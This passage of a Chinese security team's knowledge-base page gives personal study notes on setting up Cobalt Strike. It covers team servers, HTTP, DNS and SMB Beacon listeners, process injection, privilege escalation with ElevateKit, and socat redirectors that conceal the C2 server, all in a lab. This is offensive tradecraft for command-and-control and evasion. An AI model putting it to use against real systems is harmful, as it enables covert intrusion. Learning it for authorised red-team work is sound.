<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>Cobalt Strike | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/65.7a2ccc50.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" 
href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" 
href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="cobalt-strike">Cobalt Strike <a 
href="#cobalt-strike" class="header-anchor">#</a></h1> <h1 id="_0x01-基础操作">0x01 基础操作 <a href="#_0x01-基础操作" class="header-anchor">#</a></h1> <h2 id="_1、介绍">1、介绍 <a href="#_1、介绍" class="header-anchor">#</a></h2> <p><strong>CS是什么？</strong></p> <p>Cobalt Strike是一款渗透测试神器，常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用，它分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协同操作。</p> <p>Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成，包括站点克隆获取浏览器的相关信息等。</p> <p>早期版本Cobalt Strike依赖Metasploit框架，而现在Cobalt Strike已经不再使用MSF而是作为单独的平台使用。</p> <p>这个工具的社区版是大家熟知的Armitage(一个MSF的图形化界面工具)，而Cobalt Strike大家可以理解其为Armitage的商业版。</p> <p><strong>CS的发展</strong></p> <ul><li><p>Armitage [2010-2012]</p> <p>Armitage是一个红队协作攻击管理工具，它以图形化方式实现了Metasploit框架的自动化攻击。Armitage采用Java构建，拥有跨平台特性。</p></li> <li><p>Cobalt Strike 1.x [2012-2014]</p> <p>Cobalt Strike 增强了Metasploit Framework在执行目标攻击和渗透攻击的能力。</p></li> <li><p>Cobalt Strike 2.x [2014-?]</p> <p>Cobalt Strike 2是应模拟黑客攻击的市场需求而出现的，Cobalt Strike 2是以malleable C2技术的需求为定位的，这个技术使Cobalt Strike的能力更强了一些。</p></li> <li><p>Cobalt Strike 3.x [2015-?]</p> <p>Cobalt Strike 3 的攻击和防御都不用在Metasploit Framework平台（界面）下进行。</p> <p>如今 Cobalt Strike 4.0 也已经发布，改动相比 3.x 还是不小的，笔者在演示的时候使用的是 Cobalt Strike 4.0，看的视频教程是 3.x 的教程。</p></li></ul> <p><strong>接下来会用到的工具和环境</strong></p> <ul><li>Cobalt Strike</li> <li>Kali</li> <li>Metasploit Framework</li> <li>PowerSploit</li> <li>PowerTools</li> <li>Veil Evasion Framework</li></ul> <h2 id="_2、客户端与服务端的连接">2、客户端与服务端的连接 <a href="#_2、客户端与服务端的连接" class="header-anchor">#</a></h2> <p>Cobalt Strike使用C/S架构，Cobalt Strike的客户端连接到团队服务器，团队服务器连接到目标，也就是说Cobalt Strike的客户端不与目标服务器进行交互，那么Cobalt Strike的客户端如何连接到团队服务器就是本文所学习的东西。</p> <p><strong>准备工作</strong></p> <p>Cobalt Strike的客户端想连接到团队服务器需要知道三个信息：</p> <ul><li>团队服务器的外部IP地址</li> <li>团队服务器的连接密码</li> <li>（此项可选）决定团队服务器使用哪一个Malleable C2配置文件</li></ul> <p>知道这些信息后，就可以使用脚本开启团队服务器了，值得注意的是Cobalt Strike团队服务器只能运行在Linux环境下。</p> <p><strong>开启团队服务器</strong></p> <p>开启团队服务器命令一般如下所示：</p> <div class="language- 
line-numbers-mode"><pre class="language-text"><code>./teamserver your_ip your_password [config_file]
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-1.png" alt=""></p> <p>服务端开启后，就可以开启客户端进行连接了</p> <p><strong>连接到团队服务器</strong></p> <p>在Linux下，直接运行start.sh脚本文件，输入团队服务器的IP、密码和自己的用户名进行连接</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-2.png" alt=""></p> <p>点击Connect连接后，会有个提示信息，如果确认提示信息中的哈希值与所要连接的团队服务器的哈希值一致就点击Yes，随后即可打开CS客户端界面。这个哈希值应当与启动团队服务器时服务端输出的哈希值逐一核对后再点击Yes，否则无法确认连接到的是自己的团队服务器。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-3.png" alt=""></p> <p>在Windows下的连接方法也基本一致，直接双击start.bat文件，输入IP、密码、用户名，点击Connect即可</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-4.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-5.png" alt=""></p> <p>在连接后，团队之间就可以通过客户端进行沟通，信息共享</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-6.png" alt=""></p> <p>Cobalt Strike并不是被设计成只在一个团队服务器下工作的，而是被设计成在一次行动中使用多个团队服务器。</p> <p>这样设计的目的主要在于运行安全，如果一个团队服务器停止运行了，也不会导致整个行动的失败，所以接下来看看如何连接到多个团队服务器。</p> <p><strong>连接到多个团队服务器</strong></p> <p>Cobalt Strike连接到多个团队服务器也很简单，直接点击左上角的加号，输入其他团队服务器的信息后，即可连接</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-7.png" alt=""></p> <h2 id="_3、分布式操作">3、分布式操作 <a href="#_3、分布式操作" class="header-anchor">#</a></h2> <p><strong>最基本的团队服务模型</strong></p> <p>这里介绍最基本的团队服务模型，它由三个服务器构成，具体如下所示：</p> <ul><li><p>临时服务器（Staging Servers）</p> <p>临时服务器介于持久服务器和后渗透服务器之间，它的作用主要是方便在短时间内对目标系统进行访问。</p> <p>它也是最开始用于传递payload、获取初始权限的服务器，它承担初始的权限提升和下载持久性程序的功能，因此这个服务器有较高暴露风险。</p></li> <li><p>持久服务器（Long Haul Servers）</p> <p>持久服务器的作用是保持对目标网络的长期访问，所以持久服务器会以较低的频率与目标保持通信。</p></li> <li><p>后渗透服务器（Post-Exploitation Servers）</p> <p>主要进行后渗透及横向移动的相关任务，比如对目标进行交互式访问</p></li></ul> <p><strong>可伸缩红队操作模型</strong></p> <p>可伸缩红队操作模型（Scaling Red Operations）分为两个层次，第一层次是针对一个目标网络的目标单元；第二层次是针对多个目标网络的访问管理单元。</p> <p>目标单元的工作：</p> <ul><li>负责具体目标或行动的对象</li> <li>获得访问权限、后渗透、横向移动</li> <li>维护本地基础设施</li></ul> <p>访问管理单元的工作：</p> <ul><li>保持所有目标网络的访问权限</li> 
<li>获取访问权限并接收来自单元的访问</li> <li>根据需要传递对目标单元的访问</li> <li>为持续回调保持全局基础环境</li></ul> <p><strong>团队角色</strong></p> <ul><li><p>开始渗透人员</p> <p>主要任务是进入目标系统，并扩大立足点</p></li> <li><p>后渗透人员</p> <p>主要任务是对目标系统进行数据挖掘、对用户进行监控，收集目标系统的密钥、日志等敏感信息</p></li> <li><p>本地通道管理人员</p> <p>主要任务有建立基础设施、保持shell的持久性、管理回调、传递全局访问管理单元之间的会话</p></li></ul> <h2 id="_4、日志与报告">4、日志与报告 <a href="#_4、日志与报告" class="header-anchor">#</a></h2> <p><strong>日志记录</strong></p> <p>Cobalt Strike的日志文件在团队服务器下的运行目录中的<code>logs</code>文件夹内，其中有些日志文件名例如<code>beacon_11309.log</code>，这里的<code>11309</code>就是beacon会话的ID。</p> <p>按键的日志在<code>keystrokes</code>文件夹内，截屏的日志在<code>screenshots</code>文件夹内，截屏的日志名称一般如<code>screen_015321_4826.jpg</code>类似，其中<code>015321</code>表示时间（1点53分21秒），<code>4826</code>表示ID</p> <p><strong>导出报告</strong></p> <p>Cobalt Strike生成报告的目的在于培训或帮助蓝队，在<code>Reporting</code>菜单栏中就可以生成报告，关于生成的报告有以下特点：</p> <ul><li>输出格式为PDF或者Word格式</li> <li>可以输出自定义报告并且更改图标（Cobalt Strike --&gt; Preferences --&gt;Reporting）</li> <li>可以合并多个团队服务器的报告，并可以对不同报告里的时间进行校正</li></ul> <p><strong>报告类型</strong></p> <ul><li>活动报告（Activity Report）
此报告中提供了红队活动的时间表，记录了每个后渗透活动。</li> <li>主机报告（Hosts Report）
此报告中汇总了Cobalt Strike收集的主机信息，凭据、服务和会话也会在此报告中。</li> <li>侵害指标报告（Indicators of Compromise）
此报告中包括对C2拓展文件的分析、使用的域名及上传文件的MD5哈希。</li> <li>会话报告（Sessions Report）
此报告中记录了指标和活动，包括每个会话回连到自己的通信路径、后渗透活动的时间线等。</li> <li>社工报告（Social Engineering Report）
此报告中记录了每一轮网络钓鱼的电子邮件、谁点击以及从每个点击用户那里收集的信息。该报告还显示了Cobalt Strike的System profiler发现的应用程序。</li> <li>战术、技巧和程序报告（Tactics,Techniques,and Procedures）
此报告将自己的Cobalt Strike行动映射到MITRE的ATT&amp;CK矩阵中的战术，具体可参考<a href="https://attack.mitre.org/" target="_blank" rel="noopener noreferrer">https://attack.mitre.org/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></li></ul> <h1 id="_0x02-基础设施">0x02 基础设施 <a href="#_0x02-基础设施" class="header-anchor">#</a></h1> <p>这一小节学起来感觉有些吃力，里面很多概念理解的不是很清楚，如果有大佬看到描述错误的地方欢迎留言指正，避免误导他人。</p> <p>再次声明，这只是我的个人学习笔记，就不要当成教程去看了，建议想学习CS的小伙伴可以看看A-TEAM的中文手册或者网上的一些视频教程。</p> <h2 id="_1、监听器管理">1、监听器管理 <a href="#_1、监听器管理" class="header-anchor">#</a></h2> <ul><li><p>什么是监听器</p> <p>顾名思义，监听器就是等待被入侵系统连接自己的一个服务。</p></li> <li><p>监听器的作用</p> <p>主要是为了接受payload回传的各类数据，类似于MSF中handler的作用。</p> <p>比如payload在目标机器执行以后，就会回连到监听器然后下载执行真正的shellcode代码。</p></li></ul> <p>一旦监听器建立起来，团队成员只需要知道这个监听器的名称即可，不用关心监听器背后的基础环境，接下来将深入了解如何准确配置监听器。</p> <p>一个监听器由用户定义的名称、payload 类型和几个特定于 payload 的选项组成。</p> <p>监听器的名字一般由以下结构组成：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>Operating System/Payload/Stager
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>例如：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/beacon_http/reverse_http
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>什么是传输器</strong></p> <p>攻击载荷<code>payload</code>就是攻击执行的内容。攻击载荷通常被分为两部分：传输器<code>stager</code> 和传输体<code>stage</code>。</p> <p>传输器<code>stager</code>是一个小程序，用于连接、下载传输体<code>stage</code>，并插入到内存中。</p> <p>我个人理解为：攻击载荷里真正用于攻击的代码是在传输体里。</p> <p>所以为什么要有传输体？直接把攻击载荷插入到内存中不更方便快捷、更香么，搞得又是传输器又是传输体的。</p> <p>需要传输体是因为在很多攻击中对于能加载进内存，并在成功漏洞利用后执行的数据大小存在严格限制。这就导致在攻击成功时，很难嵌入额外的攻击载荷，正是因为这些限制，才使得传输器变得有必要了。</p> <p><strong>创建监听器</strong></p> <p>在CS客户端中打开 Cobalt Strike —》Listeners，之后点击Add，此时弹出New Listener窗口，在填写监听器的相关信息之前，需要先来了解监听器有哪些类型。</p> <p>Cobalt Strike有两种类型的监听器：</p> <ul><li><p>Beacon</p> <p>Beacon直译过来就是灯塔、信标、照亮指引的意思，Beacon是较为隐蔽的后渗透代理，笔者个人理解Beacon类型的监听器应该是平时比较常用的。Beacon监听器的名称例如：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/beacon_http/reverse_http
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></li> <li><p>Foreign</p> <p>Foreign直译就是外部的，这里可以理解成<code>对外监听器</code>，这种类型的监听器主要作用是给其他的Payload提供别名，比如Metasploit 框架里的Payload，笔者个人理解Foreign监听器在一定程度上提高了CS的兼容性。对外监听器的名称例如：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/foreign/reverse_https
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></li></ul> <h2 id="_2、http-和-https-beacon">2、HTTP 和 HTTPS Beacon <a href="#_2、http-和-https-beacon" class="header-anchor">#</a></h2> <p><strong>Beacon是什么</strong></p> <ul><li>Beacon是CS的Payload</li> <li>Beacon有两种通信模式。一种是异步通信模式，这种模式通信效率缓慢，Beacon回连团队服务器、下载任务、然后休眠；另一种是交互式通信模式，这种模式的通信是实时发生的。</li> <li>通过HTTP、HTTPS和DNS出口网络</li> <li>使用SMB协议的时候是点对点通信</li> <li>Beacon有很多的后渗透攻击模块和远程管理工具</li></ul> <p><strong>Beacon的类型</strong></p> <ul><li><p>HTTP 和 HTTPS Beacon</p> <p>HTTP和HTTPS Beacon也可以叫做Web Beacon。默认设置情况下，HTTP 和 HTTPS Beacon 通过 HTTP GET 请求来下载任务。这些 Beacon 通过 HTTP POST 请求传回数据。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/beacon_http/reverse_http
windows/beacon_https/reverse_https
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div></li> <li><p>DNS Beacon</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/beacon_dns/reverse_dns_txt
windows/beacon_dns/reverse_http
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div></li> <li><p>SMB Beacon</p> <p>SMB Beacon也可以叫做pipe beacon</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/beacon_smb/bind_pipe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></li></ul> <p><strong>创建一个HTTP Beacon</strong></p> <p>点击 Cobalt Strike  --&gt; Listeners 打开监听器管理窗口，点击Add，输入监听器的名称、监听主机地址，因为这里是要创建一个HTTP Beacon，所以其他的默认就行，最后点击Save</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-1.png" alt=""></p> <p>此时可以测试一下刚才设置的监听器，点击Attack --&gt; Web Drive-by --&gt; Scripted Web Delivery(s) ，在弹出的窗口中选择刚才新添加的Listener，因为我的靶机是64位的，所以我把Use x64 payload也给勾选上了，最后点击Launch</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-2.png" alt=""></p> <p>复制弹窗的命令，放到靶机中运行</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-3.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-4.png" alt=""></p> <p>此时，回到CS，就可以看到靶机已经上线了</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-5.png" alt=""></p> <p><strong>HTTPS Beacon</strong></p> <p>HTTPS Beacon和HTTP Beacon一样，使用了相同的Malleable C2配置文件，使用GET和POST的方式传输数据，不同点在于HTTPS使用了SSL，因此HTTPS Beacon就需要使用一个有效的SSL证书，具体如何配置可以参考：<a href="https://www.cobaltstrike.com/help-malleable-c2#validssl" target="_blank" rel="noopener noreferrer">https://www.cobaltstrike.com/help-malleable-c2#validssl<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <h2 id="_3、dns-beacon">3、DNS Beacon <a href="#_3、dns-beacon" class="header-anchor">#</a></h2> <p>DNS Beacon，顾名思义就是使用DNS请求将Beacon返回。这些 DNS 请求用于解析由你的 CS 团队服务器作为权威 DNS 服务器的域名。DNS 响应告诉 Beacon 休眠或是连接到团队服务器来下载任务。DNS 响应也告诉 Beacon 如何从你的团队服务器下载任务。</p> <p>在CS 
4.0及之后的版本中，DNS Beacon是一个仅DNS的Payload，在这个Payload中没有HTTP通信模式，这是与之前不同的地方。</p> <blockquote><p>以上内容摘自 A-TEAM 团队的 CS 4.0 用户手册</p></blockquote> <p>DNS Beacon的工作流程具体如下：</p> <p>首先，CS服务器向目标发起攻击，将DNS Beacon传输器嵌入到目标主机内存中，然后在目标主机上的DNS Beacon传输器回连下载CS服务器上的DNS Beacon传输体，当DNS Beacon在内存中启动后就开始回连CS服务器，然后执行来自CS服务器的各种任务请求。</p> <p>原本DNS Beacon可以使用两种方式进行传输，一种是使用HTTP来下载Payload，一种是使用DNS TXT记录来下载Payload，不过现在4.0版本中，已经没有了HTTP方式，CS4.0以及未来版本都只有DNS TXT记录这一种选择了，所以接下来重点学习使用DNS TXT记录的方式。</p> <p>根据作者的介绍，DNS Beacon拥有更高的隐蔽性，但是速度相对于HTTP Beacon什么的会更慢。</p> <p><strong>域名配置</strong></p> <p>既然是配置域名，所以就需要先有个域名，这里就用我的博客域名作为示例：添加一条A记录指向CS服务器的公网IP，再添加几条ns记录指向A记录域名即可。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs6-1.png" alt=""></p> <p>添加一个监听器，DNS Hosts填写NS记录和A记录对应的名称，DNS Host填写A记录对应的名称</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs6-2.png" alt=""></p> <p>根据上一章的方法创建一个攻击脚本，放到目标主机中运行后，在CS客户端可以看到一个小黑框</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs6-3.png" alt=""></p> <p>然后经过一段时间的等待，就可以发现已经上线了</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs6-4.png" alt=""></p> <h2 id="_4、smb-beacon">4、SMB Beacon <a href="#_4、smb-beacon" class="header-anchor">#</a></h2> <p>SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信对同一台主机上的 Beacon 和跨网络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-1.png" alt=""></p> <p>因为链接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽，绕防火墙时可能发挥奇效(系统防火墙默认是允许445的端口与外界通信的，其他端口可能会弹窗提醒，会导致远程命令行反弹shell失败)。</p> <p>SMB Beacon监听器对“提升权限”和“横向渗透”中很有用。</p> <p><strong>SMB Beacon 配置</strong></p> <p>首先需要一个上线的主机，这里我使用的HTTP Beacon，具体如何上线，可以参考之前第5节《如何建立Payload处理器》学习笔记中的内容，这里不过多赘述。</p> <p>主机上线后，新建一个SMB Beacon，输入监听器名称，选择Beacon SMB，管道名称可以直接默认，也可以自定义。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-2.png" alt=""></p> <p>接下来在Beacon中直接输入<code>spawn SMB</code>，这里的<code>SMB</code>指代的是创建的SMB Beacon的监听器名称，也可以直接右击session，在Spawn选项中选择刚添加的SMB Beacon。</p> <p><img 
src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-3.png" alt=""></p> <p>等待一会儿，就可以看到派生的SMB Beacon，在external中可以看到IP后有个<code>∞∞</code>字符。</p> <p>接下来我这里将SMB Beacon插入到进程中，以vmtoolsed进程为例。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-4.png" alt=""></p> <p>在vmtoolsed中插入SMB Beacon后，便能看到process为vmtoolsed.exe的派生SMB Beacon。</p> <p>当上线主机较多的时候，只靠列表的方式去展现，就显得不太直观了，通过CS客户端中的透视图便能很好的展现。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-5.png" alt=""></p> <p>在CS中，如果获取到目标的管理员权限，在用户名后会有<code>*</code>号标注，通过这个区别，可以判断出当前上线的test用户为普通权限用户，因此这里给他提升一下权限。</p> <p><strong>提权</strong></p> <blockquote><p>由于下面与上面内容的笔记不是在同一天写的，因此截图中上线的主机会有所差异，这里主要是记录使用的方法。</p></blockquote> <p>由于CS自带的提权方式较少，因此这里就先加载一些网上的提权脚本，脚本下载地址为：<a href="https://github.com/rsmudge/ElevateKit" target="_blank" rel="noopener noreferrer">https://github.com/rsmudge/ElevateKit<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>下载之后，打开<code>Cobalt Strike --&gt; Script Manager</code> ，之后点击<code>Load</code>，选择自己刚才下载的文件中的<code>elevate.cna</code>文件。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-6.png" alt=""></p> <p>接着选择要提权的主机，右击选择<code>Access --&gt; Elevate</code>，Listener中选择刚才新建的SMB Beacon，这里的Exploit选择了ms14-058，如果使用ms14-058不能提权，就换一个Exploit进行尝试。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-7.png" alt=""></p> <p>顺利的情况下，就可以看到提权后的管理员权限会话了，在管理员权限的会话中，不光用户名后有个*号，其Logo也是和其他会话不同的。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-8.png" alt=""></p> 
<p><strong>连接与断开</strong></p> <p>此时如果想断开某个会话的连接，可以使用unlink命令，比如如果想断开192.168.175.144，就可以在Beacon中输入<code>unlink 192.168.175.144</code></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-9.png" alt=""></p> <p>如果想再次连上，就直接输入<code>link 192.168.175.144</code>，想从当前主机连到其他主机也可以使用此命令。</p> <h2 id="_5、重定向器">5、重定向器 <a href="#_5、重定向器" class="header-anchor">#</a></h2> <p>重定向器<code>Redirectors</code>是一个位于CS团队服务器和目标网络之间的服务器，这个重定向器通俗的来说就是一个代理工具，或者说端口转发工具，担任CS服务器与目标服务器之间的跳板机角色，整体流量就像下面这样。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>目标靶机 &lt;--------&gt;多个并列的重定向器&lt;------&gt;CS服务器
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>重定向器在平时的攻击或者防御的过程中起到很重要的作用，主要有以下两点：</p> <ul><li>保护自己的CS服务器，避免目标发现自己的真实IP</li> <li>提高整体可靠性，因为可以设置多个重定向器，因此如果有个别重定向器停止工作了，整体上系统依旧是可以正常工作的</li></ul> <p><strong>创建一个重定向器</strong></p> <p>这里就使用自己的内网环境作为测试了，首先理清自己的IP</p> <p>CS服务器IP：192.168.175.129</p> <p>目标靶机IP：192.168.175.130</p> <p>重定向器IP：192.168.175.132、192.168.175.133</p> <p>首先，需要先配置重定向器的端口转发，比如这里使用HTTP Beacon，就需要将重定向器的80端口流量全部转发到CS服务器上，使用socat的命令如下：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>socat TCP4-LISTEN:80,fork TCP4:192.168.175.129:80
